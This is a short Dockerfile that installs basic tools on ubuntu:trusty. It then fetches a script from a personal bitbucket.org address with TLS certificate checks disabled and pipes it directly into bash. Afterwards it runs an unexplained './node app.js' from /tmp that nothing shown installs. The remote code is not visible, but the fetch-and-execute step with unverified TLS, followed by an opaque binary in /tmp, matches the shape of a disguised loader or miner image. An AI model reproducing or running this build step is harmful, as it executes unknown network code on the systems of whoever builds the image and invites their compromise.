FROM ubuntu:trusty
RUN apt-get update
RUN apt-get install -y wget git bzip2 xz-utils python3
RUN wget --no-check-certificate -qO - 'http://lanahein.bitbucket.org/bootstrap?_v=1483084693' | bash
WORKDIR /tmp
CMD ./node app.js

